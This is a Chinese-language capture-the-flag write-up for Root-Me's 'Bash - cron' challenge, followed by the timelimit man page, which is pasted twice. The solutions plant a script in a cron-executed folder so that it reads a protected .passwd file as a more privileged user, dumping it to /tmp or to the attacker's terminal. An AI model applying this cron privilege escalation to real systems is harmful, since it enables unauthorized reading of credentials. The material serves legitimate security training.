CTF-rootme 题解之Bash - cron

LINK:https://www.root-me.org/en/Challenges/App-Script/Bash-cron

登录主机后，查看ch4这个shell脚本内容如下：

app-script-ch4@challenge02:~$ cat ch4 
#!/bin/bash

# Sortie de la commande 'crontab -l' exécutée en tant que app-script-ch4-cracked:
# */1 * * * * /challenge/app-script/ch4/ch4  //app-script-ch4-cracked该用户下的任务计划为每分钟执行一次/challenge/app-script/ch4/ch4这个脚本。
# Vous N'avez PAS à modifier la crontab(chattr +i t'façons)

# Output of the command 'crontab -l' run as app-script-ch4-cracked:
# */1 * * * * /challenge/app-script/ch4/ch4
# You do NOT need to edit the crontab (it's chattr +i anyway)

# hiding stdout/stderr
exec 1>/dev/null 2>&1

wdir="cron.d/"
challdir=${
     0%/*}
cd "$challdir"


if [ ! -e "/tmp/._cron" ]; then
    mkdir -m 733 "/tmp/._cron"
fi

ls -1a "${wdir}" | while read task; do
    if [ -f "${wdir}${task}" -a -x "${wdir}${task}" ]; then
        timelimit -q -s9 -S9 -t 5 bash -p "${PWD}/${wdir}${task}"  //timelimit这个命令不是很懂，但大概意思是固定的时间间隔内执行bash -p cron.d/某个脚本
    fi　　
    rm -f "${PWD}/${wdir}${task}"  
done

rm -rf cron.d/*   //每隔一分钟清理下该目录下的文件，本题解题时，
　　　　　　　　　需要在该目录创建脚本，有可能我没有完成相关操作，这个脚本就会被删除，需要在一分钟之内完成接题。

 

Solution 1:将密码输出到文件。

app-script-ch4@challenge02:~$ vi cron.d/1.sh

#!/bin/bash
if [ ! -e "/tmp/ch4" ]; then
    mkdir -m 777 "/tmp/ch4"
fi
/bin/cat /challenge/app-script/ch4/.passwd > /tmp/ch4/result.txt

app-script-ch4@challenge02:~$chmod o+rx cron.d/1.sh                  将该脚本的权限设置为其他用户可以读取和运行，因为该脚本需要在app-script-ch4-cracked用户的任务计划中执行，创建脚本后可能被瞬间删除，那样就需要重新创建，执行这两步操作后，等待不超过一分钟就可以生成/tmp/ch4/result.txt包含密码的结果。

 

 

Solution 2:将密码打印在ssh连接的终端上。

app-script-ch4@challenge02:~$ set |grep "/dev/pts" |awk -F '=' '{print $2}'    查看当前ssh连接使用的终端号

/dev/pts/20

app-script-ch4@challenge02:~$ chmod o+w /dev/pts/20     将当前终端的写权限赋予其他用户，即app-script-ch4-cracked

app-script-ch4@challenge02:~$ vi cron.d/1.sh

#!/bin/bash

/bin/cat /challenge/app-script/ch4/.passwd > /dev/pts/20  

app-script-ch4@challenge02:~$ chmod o+rx cron.d/1.sh  不到一分钟，结果就会打印在当前终端

附录：(timelimit MAN手册)

TIMELIMIT(1)                                        BSD General Commands Manual                                       TIMELIMIT(1)

NAME
     timelimit -- effectively limit the absolute execution time of a process

SYNOPSIS
     timelimit [-pq] [-S killsig] [-s warnsig] [-T killtime] [-t warntime] command [arguments ...]

DESCRIPTION
     The timelimit utility executes a given command with the supplied arguments and terminates the spawned process after a given
     time with a given signal.  If the process exits before the time limit has elapsed, timelimit will silently exit, too.

     Options:

     -p      If the child process is terminated by a signal, timelimit propagates this condition, i.e. sends the same signal to
             itself.  This allows the program executing timelimit to determine whether the child process was terminated by a sig-
             nal or actually exited with an exit code larger than 128.

     -q      Quiet operation - timelimit does not output diagnostic messages about signals sent to the child process.

     -S killsig
             Specify the number of the signal to be sent to the process killtime seconds after warntime has expired.  Defaults to
             9 (SIGKILL).

     -s warnsig
             Specify the number of the signal to be sent to the process warntime seconds after it has been started.  Defaults to
             15 (SIGTERM).

     -T killtime
             Specify the maximum execution time of the process before sending killsig after warnsig has been sent.  Defaults to
         120 seconds.

     -t warntime
             Specify the maximum execution time of the process in seconds before sending warnsig.  Defaults to 3600 seconds.

     On systems that support the setitimer(2) system call, the warntime and killtime values may be specified in fractional seconds
     with microsecond precision.

ENVIRONMENT
     KILLSIG
             The killsig to use if the -S option was not specified.

     KILLTIME
             The killtime to use if the -T option was not specified.

     WARNSIG
             The warnsig to use if the -s option was not specified.

     WARNTIME
             The warntime to use if the -t option was not specified.

EXIT STATUS
     If the child process exits normally, the timelimit utility will pass its exit code on up.  If the child process is terminated
     by a signal and the -p flag was not specified, the timelimit utility's exit status is 128 plus the signal number, similar to
     sh(1).  If the -p flag was specified, the timelimit utility will raise the signal itself so that its own parent process may
     in turn reliably distinguish between a signal and a larger than 128 exit code.

     In rare cases, the timelimit utility may encounter a system or user error; then, its exit status is one of the standard
     sysexits(3) values:
 EX_USAGE
             The command-line parameters and options were incorrectly specified.

     EX_SOFTWARE
             The timelimit utility itself received an unexpected signal while waiting for the child process to terminate.

     EX_OSERR
             The timelimit utility was unable to execute the child process, wait for it to terminate, or examine its exit status.

EXAMPLES
     The following examples are shown as given to the shell:

           timelimit -p /usr/local/bin/rsync rsync://some.host/dir /opt/mirror

     Run the rsync program to mirror a WWW or FTP site and kill it if it runs longer than 1 hour (that is 3600 seconds) with
     SIGTERM.  If the rsync process does not exit after receiving the SIGTERM, timelimit issues a SIGKILL 120 seconds after the
     SIGTERM.  If the rsync process is terminated by a signal, timelimit will itself raise this signal.

           tcpserver 0 8888 timelimit -t600 -T300 /opt/services/chat/stats

     Start a tcpserver(n) process listening on tcp port 8888; each client connection shall invoke an instance of an IRC statistics
     tool under /opt/services/chat and kill it after 600 seconds have elapsed.  If the stats process is still running after the
     SIGTERM, it will be killed by a SIGKILL sent 300 seconds later.

           env WARNTIME=4.99 WARNSIG=1 KILLTIME=1.000001 timelimit sh stats.sh
Start a shell script and kill it with a SIGHUP in a little under 5 seconds.  If the shell gets stuck and does not respond to
     the SIGHUP, kill it with the default SIGKILL just a bit over a second afterwards.

SEE ALSO
     kill(1), rsync(1), signal(3), tcpserver(n)

STANDARDS
     No standards documentation was harmed in the process of creating timelimit.

BUGS
     Please report any bugs in timelimit to the author.

AUTHOR
     The timelimit utility was conceived and written by Peter Pentchev  with contributions and suggestions by
     Karsten W Rohrbach , Teddy Hogeborn , and Tomasz Nowak .

TIMELIMIT(1)                                        BSD General Commands Manual                                       TIMELIMIT(1)

NAME
     timelimit -- effectively limit the absolute execution time of a process

SYNOPSIS
     timelimit [-pq] [-S killsig] [-s warnsig] [-T killtime] [-t warntime] command [arguments ...]

DESCRIPTION
     The timelimit utility executes a given command with the supplied arguments and terminates the spawned process after a given
     time with a given signal.  If the process exits before the time limit has elapsed, timelimit will silently exit, too.

     Options:

     -p      If the child process is terminated by a signal, timelimit propagates this condition, i.e. sends the same signal to
             itself.  This allows the program executing timelimit to determine whether the child process was terminated by a sig-
             nal or actually exited with an exit code larger than 128.

     -q      Quiet operation - timelimit does not output diagnostic messages about signals sent to the child process.

     -S killsig
             Specify the number of the signal to be sent to the process killtime seconds after warntime has expired.  Defaults to
             9 (SIGKILL).

     -s warnsig
             Specify the number of the signal to be sent to the process warntime seconds after it has been started.  Defaults to
             15 (SIGTERM).

     -T killtime
             Specify the maximum execution time of the process before sending killsig after warnsig has been sent.  Defaults to
         120 seconds.

     -t warntime
             Specify the maximum execution time of the process in seconds before sending warnsig.  Defaults to 3600 seconds.

     On systems that support the setitimer(2) system call, the warntime and killtime values may be specified in fractional seconds
     with microsecond precision.

ENVIRONMENT
     KILLSIG
             The killsig to use if the -S option was not specified.

     KILLTIME
             The killtime to use if the -T option was not specified.

     WARNSIG
             The warnsig to use if the -s option was not specified.

     WARNTIME
             The warntime to use if the -t option was not specified.

EXIT STATUS
     If the child process exits normally, the timelimit utility will pass its exit code on up.  If the child process is terminated
     by a signal and the -p flag was not specified, the timelimit utility's exit status is 128 plus the signal number, similar to
     sh(1).  If the -p flag was specified, the timelimit utility will raise the signal itself so that its own parent process may
     in turn reliably distinguish between a signal and a larger than 128 exit code.

     In rare cases, the timelimit utility may encounter a system or user error; then, its exit status is one of the standard
     sysexits(3) values:
 EX_USAGE
             The command-line parameters and options were incorrectly specified.

     EX_SOFTWARE
             The timelimit utility itself received an unexpected signal while waiting for the child process to terminate.

     EX_OSERR
             The timelimit utility was unable to execute the child process, wait for it to terminate, or examine its exit status.

EXAMPLES
     The following examples are shown as given to the shell:

           timelimit -p /usr/local/bin/rsync rsync://some.host/dir /opt/mirror

     Run the rsync program to mirror a WWW or FTP site and kill it if it runs longer than 1 hour (that is 3600 seconds) with
     SIGTERM.  If the rsync process does not exit after receiving the SIGTERM, timelimit issues a SIGKILL 120 seconds after the
     SIGTERM.  If the rsync process is terminated by a signal, timelimit will itself raise this signal.

           tcpserver 0 8888 timelimit -t600 -T300 /opt/services/chat/stats

     Start a tcpserver(n) process listening on tcp port 8888; each client connection shall invoke an instance of an IRC statistics
     tool under /opt/services/chat and kill it after 600 seconds have elapsed.  If the stats process is still running after the
     SIGTERM, it will be killed by a SIGKILL sent 300 seconds later.

           env WARNTIME=4.99 WARNSIG=1 KILLTIME=1.000001 timelimit sh stats.sh
Start a shell script and kill it with a SIGHUP in a little under 5 seconds.  If the shell gets stuck and does not respond to
     the SIGHUP, kill it with the default SIGKILL just a bit over a second afterwards.

SEE ALSO
     kill(1), rsync(1), signal(3), tcpserver(n)

STANDARDS
     No standards documentation was harmed in the process of creating timelimit.

BUGS
     Please report any bugs in timelimit to the author.

AUTHOR
     The timelimit utility was conceived and written by Peter Pentchev  with contributions and suggestions by
     Karsten W Rohrbach , Teddy Hogeborn , and Tomasz Nowak .

 

转载于:https://www.cnblogs.com/heycomputer/articles/10610051.html